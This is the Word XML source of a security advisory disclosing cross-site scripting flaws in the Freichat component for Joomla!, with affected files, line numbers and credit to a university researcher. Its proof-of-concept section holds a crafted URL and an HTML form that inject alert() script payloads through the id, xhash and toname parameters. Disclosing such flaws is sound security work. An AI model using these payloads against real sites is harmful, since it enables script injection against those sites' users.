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B25" w:rsidRDefault="00EA7B25" w:rsidP="00AA0D16">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="OLE_LINK7"/>
      <w:bookmarkStart w:id="1" w:name="OLE_LINK8"/>
      <w:r w:rsidRPr="002D6543">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">Multiple cross-site scripting (XSS) vulnerabilities in </w:t>
      </w:r>
      <w:r w:rsidR="004D4716" w:rsidRPr="004D4716">
        <w:t>Freichat</w:t>
      </w:r>
      <w:r w:rsidR="004D4716">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C27AB1">
        <w:t xml:space="preserve">component </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>for Joomla</w:t>
      </w:r>
      <w:r w:rsidR="00C27AB1">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow remote attackers </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD297E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">to inject arbitrary web script or HTML </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">code via </w:t>
      </w:r>
      <w:r w:rsidR="005267DD">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">(1) </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>the id</w:t>
      </w:r>
      <w:r w:rsidR="00FC03B9">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> or xhash</w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter</w:t>
      </w:r>
      <w:r w:rsidR="00616035">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> to /client/chat.php </w:t>
      </w:r>
      <w:r w:rsidR="00121AC7">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">or </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve">(2) the </w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16" w:rsidRPr="00DA27EC">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>toname</w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter to </w:t>
      </w:r>
      <w:r w:rsidR="0008010E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="0008010E" w:rsidRPr="00DA27EC">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>client/plugins/uploa</w:t>
      </w:r>
      <w:r w:rsidR="0008010E">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>d/</w:t>
      </w:r>
      <w:r w:rsidR="00AA0D16">
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>upload.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097689D" w:rsidRDefault="0097689D" w:rsidP="0097689D">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="st"/>
        </w:rPr>
        <w:t>Discovered by Mahmoud Ghorbanzadeh, in Amirkabir University of Technology's Scientific Excellence and Research Centers</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="004D4716">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="MediumShading1-Accent1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="004D4716" w:rsidTr="00102D8B">
        <w:trPr>
          <w:cnfStyle w:val="100000000000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001419BD" w:rsidRDefault="001419BD" w:rsidP="001419BD">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001419BD" w:rsidRDefault="00E33C6F" w:rsidP="001419BD">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
            <w:r w:rsidR="001419BD">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="001419BD" w:rsidRPr="001419BD">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Freichat</w:t>
            </w:r>
            <w:r w:rsidR="00394DE0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003F1416">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="00F75F62">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidR="00394DE0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>ree version</w:t>
            </w:r>
            <w:r w:rsidR="003F1416">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001419BD" w:rsidRPr="006C1BE0" w:rsidRDefault="001419BD" w:rsidP="001419BD">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006C1BE0">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Home Page Address:</w:t>
            </w:r>
            <w:r w:rsidR="006C1BE0" w:rsidRPr="006C1BE0">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006C1BE0" w:rsidRPr="006C1BE0">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>http://codologic.com/page/codo_commerce/buy</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4716" w:rsidTr="00102D8B">
        <w:trPr>
          <w:cnfStyle w:val="000000100000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00102D8B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D4716" w:rsidRPr="00435BC3" w:rsidRDefault="004D4716" w:rsidP="00102D8B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File</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000135D9" w:rsidRPr="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>client</w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00DA27EC" w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>chat.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRPr="00DA27EC" w:rsidRDefault="004D4716" w:rsidP="000135D9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Line: </w:t>
            </w:r>
            <w:r w:rsidR="00DA27EC" w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRPr="00435BC3" w:rsidRDefault="004D4716" w:rsidP="00102D8B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D4716" w:rsidRDefault="000135D9" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD7DB9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:object w:dxaOrig="14460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8pt;height:9.65pt" o:ole="">
                  <v:imagedata r:id="rId6" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1440776926" r:id="rId7"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00102D8B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D4716" w:rsidRPr="00435BC3" w:rsidRDefault="004D4716" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>POC:</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRPr="004D4716" w:rsidRDefault="004D4716" w:rsidP="004D4716">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004D4716">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>http://site/client/chat.php?id=1" &gt;&lt;/script&gt;&lt;script&gt;alert('XSS 1')&lt;/script&gt;&amp;xhash=1" &lt;script&gt;alert('XSS 2')&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="004D4716">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004D4716" w:rsidTr="00102D8B">
        <w:trPr>
          <w:cnfStyle w:val="000000010000"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000"/>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRPr="00DA27EC" w:rsidRDefault="004D4716" w:rsidP="000135D9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File: </w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000135D9" w:rsidRPr="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>client</w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000135D9" w:rsidRPr="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>plugins</w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="000135D9" w:rsidRPr="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>upload</w:t>
            </w:r>
            <w:r w:rsidR="000135D9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="00AA0D16">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>upload</w:t>
            </w:r>
            <w:r w:rsidR="00DA27EC" w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>.php</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="00DA27EC" w:rsidP="00195475">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Line</w:t>
            </w:r>
            <w:r w:rsidR="004D4716" w:rsidRPr="00435BC3">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00195475">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="00195475" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FD7DB9">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:object w:dxaOrig="17205" w:dyaOrig="405">
                <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:468pt;height:10.75pt" o:ole="">
                  <v:imagedata r:id="rId8" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1026" DrawAspect="Content" ObjectID="_1440776927" r:id="rId9"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004D4716" w:rsidRPr="00DA27EC" w:rsidRDefault="004D4716" w:rsidP="00102D8B">
            <w:pPr>
              <w:bidi w:val="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>POC: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&lt;/style&gt;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&lt;body&gt;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&lt;div class="frei_upload_border"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DA27EC" w:rsidRPr="00DA27EC" w:rsidRDefault="00DA27EC" w:rsidP="00DE6D81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&lt;form name="upload" action="http://</w:t>
            </w:r>
            <w:r w:rsidR="00DE6D81">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>site</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>/client/plugins/upload/upload.php" method="post" enctype="multipart/form-data"&gt;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    &lt;label for="file"&gt;choose file to send&lt;/label&gt;&lt;br/&gt;&lt;br/&gt;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    &lt;input id ="fromid" type="hidden" name="fromid"/&gt;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    &lt;input id="fromname" type="hidden" name="fromname"/&gt;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    &lt;input id="toid" type="hidden" name="toid"/&gt;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ab/>
            </w:r>
            <w:r w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:tab/>
              <w:t>&lt;!-- &lt;input id="toname" type="hidden" name="toname"/&gt; --&gt;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    &lt;input id="toname" type="hidden" name="toname" value="&lt;script&gt;alert('XSS')&lt;/script&gt;"/&gt;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    &lt;input type="file" name="file" id="file" value="a.jpeg" /&gt;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    &lt;br /&gt;&lt;br/&gt;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    &lt;input  class ="frei_upload_button" type="submit" name="submit" value="Send" /&gt;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&lt;/form&gt;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    &lt;/div&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DA27EC" w:rsidRPr="00DA27EC" w:rsidRDefault="00DA27EC" w:rsidP="00DA27EC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t xml:space="preserve">    &lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F75F62" w:rsidRDefault="00DA27EC" w:rsidP="00BF0C3A">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:spacing w:after="60"/>
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DA27EC">
              <w:rPr>
                <w:rStyle w:val="filename"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004D4716" w:rsidRDefault="004D4716" w:rsidP="00F75F62">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:spacing w:after="60" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="filename"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004D4716" w:rsidSect="004877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5A2" w:rsidRDefault="00D205A2" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00D205A2" w:rsidRDefault="00D205A2" w:rsidP="00D34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5A2" w:rsidRDefault="00D205A2" w:rsidP="00D34775">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00D205A2" w:rsidRDefault="00D205A2" w:rsidP="00D347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155F"/>
    <w:rsid w:val="000135D9"/>
    <w:rsid w:val="0008010E"/>
    <w:rsid w:val="000F5CED"/>
    <w:rsid w:val="00121AC7"/>
    <w:rsid w:val="001419BD"/>
    <w:rsid w:val="00143E24"/>
    <w:rsid w:val="00195475"/>
    <w:rsid w:val="001B73BA"/>
    <w:rsid w:val="001E2F80"/>
    <w:rsid w:val="00225A6D"/>
    <w:rsid w:val="00270767"/>
    <w:rsid w:val="002D275D"/>
    <w:rsid w:val="003013DC"/>
    <w:rsid w:val="00386272"/>
    <w:rsid w:val="00394DE0"/>
    <w:rsid w:val="003B3EBC"/>
    <w:rsid w:val="003F1416"/>
    <w:rsid w:val="003F1B9E"/>
    <w:rsid w:val="004026DF"/>
    <w:rsid w:val="00412BBD"/>
    <w:rsid w:val="00471FF5"/>
    <w:rsid w:val="00487705"/>
    <w:rsid w:val="004878A3"/>
    <w:rsid w:val="004D19C6"/>
    <w:rsid w:val="004D4716"/>
    <w:rsid w:val="00510BA0"/>
    <w:rsid w:val="00513827"/>
    <w:rsid w:val="005267DD"/>
    <w:rsid w:val="0055155F"/>
    <w:rsid w:val="005660DE"/>
    <w:rsid w:val="0057578F"/>
    <w:rsid w:val="0059707B"/>
    <w:rsid w:val="005B164D"/>
    <w:rsid w:val="00616035"/>
    <w:rsid w:val="006A1895"/>
    <w:rsid w:val="006C1BE0"/>
    <w:rsid w:val="006E100A"/>
    <w:rsid w:val="00735944"/>
    <w:rsid w:val="00782C3A"/>
    <w:rsid w:val="007D36E6"/>
    <w:rsid w:val="007E4547"/>
    <w:rsid w:val="0080329F"/>
    <w:rsid w:val="00897215"/>
    <w:rsid w:val="008E58DE"/>
    <w:rsid w:val="00924D8C"/>
    <w:rsid w:val="00925818"/>
    <w:rsid w:val="00953EF0"/>
    <w:rsid w:val="009578E3"/>
    <w:rsid w:val="0097689D"/>
    <w:rsid w:val="0098226D"/>
    <w:rsid w:val="00996909"/>
    <w:rsid w:val="009A5883"/>
    <w:rsid w:val="00A32C2A"/>
    <w:rsid w:val="00A44A91"/>
    <w:rsid w:val="00A71FCB"/>
    <w:rsid w:val="00AA0D16"/>
    <w:rsid w:val="00AE7A3A"/>
    <w:rsid w:val="00B21262"/>
    <w:rsid w:val="00BB6AB2"/>
    <w:rsid w:val="00BF0C3A"/>
    <w:rsid w:val="00C267BC"/>
    <w:rsid w:val="00C27AB1"/>
    <w:rsid w:val="00C31ACB"/>
    <w:rsid w:val="00C81219"/>
    <w:rsid w:val="00CF6F13"/>
    <w:rsid w:val="00D175F0"/>
    <w:rsid w:val="00D205A2"/>
    <w:rsid w:val="00D34775"/>
    <w:rsid w:val="00DA27EC"/>
    <w:rsid w:val="00DC4A71"/>
    <w:rsid w:val="00DE6D81"/>
    <w:rsid w:val="00E20410"/>
    <w:rsid w:val="00E33C6F"/>
    <w:rsid w:val="00E445F0"/>
    <w:rsid w:val="00E54B77"/>
    <w:rsid w:val="00EA7B25"/>
    <w:rsid w:val="00ED5826"/>
    <w:rsid w:val="00F4583D"/>
    <w:rsid w:val="00F471C2"/>
    <w:rsid w:val="00F55277"/>
    <w:rsid w:val="00F739AF"/>
    <w:rsid w:val="00F75F62"/>
    <w:rsid w:val="00F80E0A"/>
    <w:rsid w:val="00FC03B9"/>
    <w:rsid w:val="00FC2FF2"/>
    <w:rsid w:val="00FD7DB9"/>
    <w:rsid w:val="00FE2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BBD"/>
    <w:pPr>
      <w:bidi/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin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-Accent3">
    <w:name w:val="Light Grid Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="004D19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D1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9C6"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="filename">
    <w:name w:val="filename"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-comment">
    <w:name w:val="phps-t-comment"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable-marked">
    <w:name w:val="phps-t-variable-marked"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-variable">
    <w:name w:val="phps-t-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004026DF"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-code">
    <w:name w:val="phps-code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="phps-t-constant-encapsed-string">
    <w:name w:val="phps-t-constant-encapsed-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004878A3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D34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4775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24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D347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775"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="B Nazanin"/>
      <w:szCs w:val="24"/>
      <w:lang w:bidi="fa-IR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006E100A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1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1262"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
      <w:lang w:bidi="fa-IR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="st">
    <w:name w:val="st"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="004D4716"/>
  </w:style>
